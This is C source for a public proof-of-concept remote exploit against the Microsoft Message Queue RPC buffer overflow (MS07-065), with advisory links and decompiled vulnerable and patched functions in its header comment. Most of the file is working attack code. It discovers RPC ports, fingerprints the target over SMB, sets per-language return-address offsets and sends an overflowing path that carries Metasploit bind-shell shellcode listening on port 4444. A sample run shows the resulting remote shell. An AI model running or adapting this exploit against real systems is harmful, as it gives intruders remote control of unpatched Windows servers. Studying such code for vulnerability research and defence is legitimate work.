/* ****************************************************************************** ********************** merry christmas Sysadmins ***************************** ****************************************************************************** ************** Microsoft Message Queue POC exploit ( MS07-065 ) ************** Mario Ballano - (mballano~gmail.com) - http://www.48bits.com Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org ******************************************************************************
* Original Advisory: http://www.zerodayinitiative.com/advisories/ZDI-07-076.html * Microsoft Bulletin : http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx * CVE Code: CVE-2007-3039 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039 * Timeline: No naked news this time, just rum and whiskey * Additional information: From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105 HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html Dave磗 unmidl http://www.immunitysec.com/resources-freesoftware.shtml * How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.
* Note: There are several rpc ports to trigger the overflow. If you hit a system then looks like you磍l need to send the exploit twice or specify another port (-p ) to exploit it again.
There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested) Adjust them if needed.
C:\Programaci髇\MessageQueue>MessageQueue.exe -------------------------------------------------------------- Microsoft MessageQueue local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 Advanced server SP4 --------------------------------------------------------------
Usage: MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]
Targets: 0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested) 1 (0x6b9d469b) - Windows 2000 Advanced server Spanish 2 (0x41414141) - Windows 2000 Advanced server crash
C:\Programaci髇\\MessageQueue>MessageQueue.exe -h -------------------------------------------------------------- Microsoft MessageQueue local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 Advanced server SP4 --------------------------------------------------------------
[+] Binding to ncacn_ip_tcp: [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[LRPC00000414.00000001] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QMsvc$testserver] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QmReplService] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncacn_ip_tcp:[1222] [+] Using gathered netbios name: testserver [+] Dynamic MessageQueue rpc port found (1222) [+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:[1222] [+] RpcBindingFromStringBinding success [+] Trying to fingerprint target... [+] Fqdn name obtained from netbios packet: testserver.local [+] Remote OS Fingerprint (05.00) [+] Remote Host identified as Windows 2000 [+] Sending POC Exploit code to QMCreateObjectInternal() [+] Try to connect to remote host at port 4444 for a shell
C:\>nc 4444 Microsoft Windows 2000 [Versi髇 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.
* Some boring technical details: Calltree: QMCreateObjectInternal() -> IsPathnameForLocalMachine() -> ReplaceDNSNameWithNetBiosName() -> us
Vulnerable calls functions: -------------------------- wchar_t *__stdcall ReplaceDNSNameWithNetBiosName(wchar_t *a1,wchar_t *a2) { wchar_t *v3; // esi@1
v3 = _wcschr(a1, 92u); _wcscpy(a2, g_szMachineName); return _wcscat(a2, v3); }
Called From: -------------
if ( !IsPathnameForLocalMachine(v9, (int)&v20) ) { v11 = -1072824300; LogMsgHR(20, off_61646450, 50); return v11; } if ( v20 ) { ReplaceDNSNameWithNetBiosName(v9, &v21); v9 = &v21; } ------
-------------------- patched version: ---------------- if ( !IsPathnameForLocalMachine(v9, (int)&v21) ) { v11 = -1072824300; LogMsgHR(20, off_61646450, 50); return v11; } if ( v21 ) { v12 = ReplaceDNSNameWithNetBiosName(v9, &v22, 141); if ( v12 < 0 ) { v13 = 55; return LogHR(v12, off_61646450, v13); } v9 = &v22; }
int __stdcall ReplaceDNSNameWithNetBiosName(wchar_t *a1,wchar_t *a2,int a3) { wchar_t *v3; // eax@1 int result; // eax@4
v3 = _wcschr(a1, 92u); if ( v3 ) result = StringCchPrintfW(a2, a3, (const char *)L"%s%s", g_szMachineName, v3); else { if ( byte_6164638C & 1 ) WPP_SF_S(dword_61646380, dword_61646384, 10, (int)&stru_615B5360, a1); LogMsgHR(6, off_61646450, 2); result = -1072824314; } return result; }
*/ #define _CRT_SECURE_NO_DEPRECATE #include <stdio.h> #include <stdlib.h> #include <ctype.h> #include "MessageQueuexpl.h" #include <winsock.h> #pragma comment(lib,"ws2_32") #define DEFAULT_RPC_MESSAGEQUEUE_PORT "2105"
void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len){ return(malloc(len)); } void __RPC_USER midl_user_free(void __RPC_FAR * ptr){ free(ptr); } int fingerprint (char *host, wchar_t *fqdn); //Fingerprint remote os for autotarget
struct _targets { char *version; char offset[4]; DWORD offsetvalue; } TARGETS[] = { //supported os { "Windows 2000 Advanced server English (default - untested)", "\x9b\x46\xad\x6b", 0x6bad469b}, //Call EDI @mqlogmgr.dll (English / 1999.8.3413.7) from metasploit database { "Windows 2000 Advanced server Spanish (tested)", "\x9b\x46\x9d\x6b", 0x6b9d469b}, // Call EDI (mqlogmgr.dll) win2k adv server sp4 spanish { "Windows 2000 server Spanish (untested)", "\x9b\x46\xd4\x6b", 0x6B9D469B}, // Call EDI (mqlogmgr.dll) win2k server sp4 spanish { "Windows 2000 Advanced server crash", "\x41\x41\x41\x41", 0x41414141}, // crash }; int lang=0;
unsigned char shellcode2k[] = /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8" "\x36\xe6\x39\x83\xeb\xfc\xe2\xf4\x54\x5c\x0d\x74\x40\xcf\x19\xc6" "\x57\x56\x6d\x55\x8c\x12\x6d\x7c\x94\xbd\x9a\x3c\xd0\x37\x09\xb2" "\xe7\x2e\x6d\x66\x88\x37\x0d\x70\x23\x02\x6d\x38\x46\x07\x26\xa0" "\x04\xb2\x26\x4d\xaf\xf7\x2c\x34\xa9\xf4\x0d\xcd\x93\x62\xc2\x11" "\xdd\xd3\x6d\x66\x8c\x37\x0d\x5f\x23\x3a\xad\xb2\xf7\x2a\xe7\xd2" "\xab\x1a\x6d\xb0\xc4\x12\xfa\x58\x6b\x07\x3d\x5d\x23\x75\xd6\xb2" "\xe8\x3a\x6d\x49\xb4\x9b\x6d\x79\xa0\x68\x8e\xb7\xe6\x38\x0a\x69" "\x57\xe0\x80\x6a\xce\x5e\xd5\x0b\xc0\x41\x95\x0b\xf7\x62\x19\xe9" "\xc0\xfd\x0b\xc5\x93\x66\x19\xef\xf7\xbf\x03\x5f\x29\xdb\xee\x3b" "\xfd\x5c\xe4\xc6\x78\x5e\x3f\x30\x5d\x9b\xb1\xc6\x7e\x65\xb5\x6a" "\xfb\x65\xa5\x6a\xeb\x65\x19\xe9\xce\x5e\xf7\x65\xce\x65\x6f\xd8" "\x3d\x5e\x42\x23\xd8\xf1\xb1\xc6\x7e\x5c\xf6\x68\xfd\xc9\x36\x51" "\x0c\x9b\xc8\xd0\xff\xc9\x30\x6a\xfd\xc9\x36\x51\x4d\x7f\x60\x70" "\xff\xc9\x30\x69\xfc\x62\xb3\xc6\x78\xa5\x8e\xde\xd1\xf0\x9f\x6e" "\x57\xe0\xb3\xc6\x78\x50\x8c\x5d\xce\x5e\x85\x54\x21\xd3\x8c\x69" "\xf1\x1f\x2a\xb0\x4f\x5c\xa2\xb0\x4a\x07\x26\xca\x02\xc8\xa4\x14" "\x56\x74\xca\xaa\x25\x4c\xde\x92\x03\x9d\x8e\x4b\x56\x85\xf0\xc6" "\xdd\x72\x19\xef\xf3\x61\xb4\x68\xf9\x67\x8c\x38\xf9\x67\xb3\x68" "\x57\xe6\x8e\x94\x71\x33\x28\x6a\x57\xe0\x8c\xc6\x57\x01\x19\xe9" "\x23\x61\x1a\xba\x6c\x52\x19\xef\xfa\xc9\x36\x51\x47\xf8\x06\x59" "\xfb\xc9\x30\xc6\x78\x36\xe6\x39";
void usage(char *argv) { int i; printf(" Usage: %s -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]\n\n",argv); printf(" Targets:\n"); for(i=0;i<sizeof(TARGETS)/sizeof(struct _targets);i++) { printf(" %i (0x%8.8x) - %s\n",i,TARGETS[i].offsetvalue,TARGETS[i].version); } exit(1); } char *DiscoverPort(char *host, char *uid, char *netbiosname) { /* Idea ripped from Sir Dystic Rpcdump */ unsigned char pszStringBinding[256]; UUID uuid; RPC_EP_INQ_HANDLE context; RPC_IF_ID id; RPC_BINDING_HANDLE handle, handle2; unsigned char * ptr; unsigned char * ptr2; unsigned char * ptr3; int dynamic=0; char name[256]="";
sprintf(pszStringBinding,"ncacn_ip_tcp:%s",host); //Construct binding if (RpcBindingFromStringBinding(pszStringBinding, &handle) == RPC_S_OK) { printf("[+] Binding to %s\n",pszStringBinding); if (RpcMgmtEpEltInqBegin( handle, RPC_C_EP_ALL_ELTS, NULL, 0, &uuid, &context)== RPC_S_OK) { while ( RpcMgmtEpEltInqNext(context, &id, &handle2, &uuid, &ptr) == RPC_S_OK) { UuidToString(&id.Uuid, &ptr2); if (strcmp(uid,ptr2)==0) { char *p; RpcBindingToStringBinding(handle2, &ptr3); printf("[+] Found %s version %u.%u\n", ptr2, id.VersMajor, id.VersMinor); printf("[+] RPC binding string: %s\n", ptr3); p=strchr(ptr3,'['); if (p) { RpcStringFree(&ptr2); p[strlen(p)-1]='\0'; dynamic=atoi(p+1); if (dynamic!=0) { strcpy(netbiosname,name); return(p+1); } else { char *q; q=strchr(p+1,'$'); if (q) { fflush(stdout); strcpy(name,q+1); } } } } RpcStringFree(&ptr2); if (handle2 != NULL) RpcBindingFree(&handle2); if (ptr != NULL) RpcStringFree(&ptr); } } } return(NULL); }
void __cdecl main(int argc, char *argv[]) { RPC_STATUS status; unsigned char * pszUuid = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; unsigned char * pszProtocolSequence = "ncacn_ip_tcp"; unsigned char * pszNetworkAddress = NULL; unsigned char * pszEndpoint = NULL; unsigned char * pszOptions = NULL; unsigned char * pszStringBinding = NULL; unsigned char * port = NULL; unsigned char * pDnsSuffix = NULL; unsigned long ulCode; int i; unsigned char NetbiosName[256] =""; printf(" --------------------------------------------------------------\n"); printf(" Microsoft MessageQueue local & remote RPC Exploit code\n"); printf(" Exploit code by Andres Tarasco & Mario Ballano\n"); printf(" Tested against Windows 2000 Advanced server SP4 \n"); printf(" --------------------------------------------------------------\n\n");
if (argc==1) usage(argv[0]); //Handle parameters for(i=1;i<argc;i++) { if ( (argv[i][0]=='-') ) { switch (argv[i][1]) { case 'h': pszNetworkAddress=argv[i+1]; break; case 't': lang=atoi(argv[i+1]); break; case 'p': port=argv[i+1]; break; case 'd': pDnsSuffix=argv[i+1]; break; case 'n': strcpy(NetbiosName,argv[i+1]); break; default: printf("[-] Invalid parameter: %s\n",argv[i]); usage(argv[0]); break; } i++; } } if ((pszNetworkAddress==NULL) ) usage(argv[0]); //Test if the remote server is supported (2k & XP) pszEndpoint=DiscoverPort(pszNetworkAddress,pszUuid,NetbiosName); if (*NetbiosName=='\0') { printf("[-] Failed to gather NetbiosName with rpc..\n"); } printf("[+] Using gathered netbios name: %s\n",NetbiosName); if (!port) { if (pszEndpoint) { printf("[+] Dynamic MessageQueue rpc port found (%s)\n",pszEndpoint); } else { printf("[-] Unable to find dynamic MessageQueue port\n"); printf("[+] Maybe remote rpc endpoint isnt running\n"); pszEndpoint=DEFAULT_RPC_MESSAGEQUEUE_PORT; printf("[+] Trying default port %s\n",pszEndpoint); } } else { pszEndpoint=port; printf("[+] Trying MessageQueue port %s\n",pszEndpoint); }
//Create an RPC binding string status = RpcStringBindingCompose(pszUuid,pszProtocolSequence,pszNetworkAddress,pszEndpoint,pszOptions,&pszStringBinding); printf("[+] Connecting to %s\n", pszStringBinding); if (status==RPC_S_OK) { status = RpcBindingFromStringBinding(pszStringBinding,&mqhandle); //RPC Binding if (status==RPC_S_OK) { long parama=1; wchar_t *paramb;//Rpc call parameter1 long paramc=0; long paramd=0; long parame=0; long paramf=0; long paramg=0; long ret; char bof[4096]; int os;
printf("[+] RpcBindingFromStringBinding success\n"); paramb=(wchar_t*)malloc(1000); memset(paramb,'\0',1000);
if (!pDnsSuffix) { os=fingerprint(pszNetworkAddress,paramb); wcscat(paramb,L"\\"); memset((char*)paramb+wcslen(paramb)*2,'A',600); } else { os=fingerprint(pszNetworkAddress,NULL); sprintf(bof,"%s.%s\\",NetbiosName,pDnsSuffix); mbstowcs(paramb,bof,strlen(bof)); memset((char*)paramb+strlen(bof)*2,'A',600); } switch (os) { case 0: //windows 2000 printf("[+] Remote Host identified as Windows 2000\n"); //exploit SEH handler for Windows 2000 advanced server memcpy((char*)paramb+352,TARGETS[lang].offset,4); //mqlogmgr.dll call edi memcpy((char*)¶mb[0]+352+4+60,shellcode2k,sizeof(shellcode2k)); //shellcode break; case 1: //windows XP printf("[+] Remote Host identified as Windows XP\n"); printf("[+] Sorry, but xp isnt supported yet :p\n"); //TODO: Add your code here =) exit(1); break; case 2: printf("[-] Remote Host identified as Windows 2003\n"); default: printf("[-] Remote Host is not vulnerable\n"); exit(1); }
printf("[+] Sending POC Exploit code to QMCreateObjectInternal()\n"); printf("[+] Try to connect to remote host at port 4444 for a shell\n");
RpcTryExcept { ret=QMCreateObjectInternal( parama, paramb, paramc, paramd, parame, paramf, paramg) ; printf("[-] Return code: %i - %i\r",ret,GetLastError()); } RpcExcept(1) { ulCode = RpcExceptionCode(); //Show returned errors from QMCreateObjectInternal() Message Queue Server printf("[-] RPC Server reported exception 0x%lx = %ld\n", ulCode, ulCode); switch (ulCode) { case 1722:printf("[-] Looks like there is no available rpc server\n"); break; case 1726:printf("[-] Looks like remote RPC server crashed :/\n"); break; default: break; } } RpcEndExcept } } }
int fingerprint (char *host,wchar_t *fqdn) { char req1[] = "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f" "\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02" "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f" "\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70" "\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30" "\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54" "\x20\x4c\x4d\x20\x30\x2e\x31\x32"; char req2[] = "\x00\x00\x00\xa4\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" "\x00\x00\x10\x00\x0c\xff\x00\xa4\x00\x04\x11\x0a\x00\x00\x00\x00" "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xd4\x00\x00\x80\x69\x00\x4e" "\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xe0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00" "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" "\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00" "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" "\x2e\x00\x30\x00\x00\x00\x00"; WSADATA ws; int sock; struct sockaddr_in remote; unsigned char buf[0x300]; int i; OSVERSIONINFO os;
if (strcmp(host,"")==0) { os.dwOSVersionInfoSize =sizeof(OSVERSIONINFO); GetVersionEx(&os); if (os.dwMajorVersion==5) return (os.dwMinorVersion); else return(-1); } if (WSAStartup(MAKEWORD(2,0),&ws)!=0) { printf("[-] WsaStartup() failed\n"); exit(1); } //NetWkstaGetInfo remote.sin_family = AF_INET; remote.sin_addr.s_addr = inet_addr(host); remote.sin_port = htons(445); sock=socket(AF_INET, SOCK_STREAM, 0); printf("[+] Trying to fingerprint target...\n"); if (connect(sock,(struct sockaddr *)&remote, sizeof(remote))>=0) { if (send(sock, req1, sizeof(req1),0) >0) { if (recv(sock, buf, sizeof (buf), 0) > 0) { if (send(sock, req2, sizeof(req2),0) >0) { i=recv(sock, buf, sizeof (buf), 0); if (i>0) { if (fqdn) { //extract fqdn name from rpc packet char *p=buf+0x67; WORD len; //DumpMem(buf,i); while(memcmp(p,"\x04\x00",2)!=0) p+=2; p+=2; memcpy((char*)&len,p,2); //printf("longitud: %i bytes\n",len); memcpy((char*)fqdn,p+2,len); printf("[+] Fqdn name obtained from netbios packet: %S\n",fqdn); }
printf("[+] Remote OS Fingerprint (%2.2x.%2.2x)\n",buf[0x60-1], buf[0x60]);
if (buf[0x60-1]==5) { return(buf[0x60]); } else { printf("\n[-] Unssuported OS\n"); } } else { printf("\n[-] Recv2 failed\n"); } } else { printf("\n[-] Send2 failed\n"); } } else { printf("\n[-] Recv failed\n"); } } else { printf("\n[-] Send failed\n"); } } else { printf("\n[-] Connect failed\n"); } return(-1); }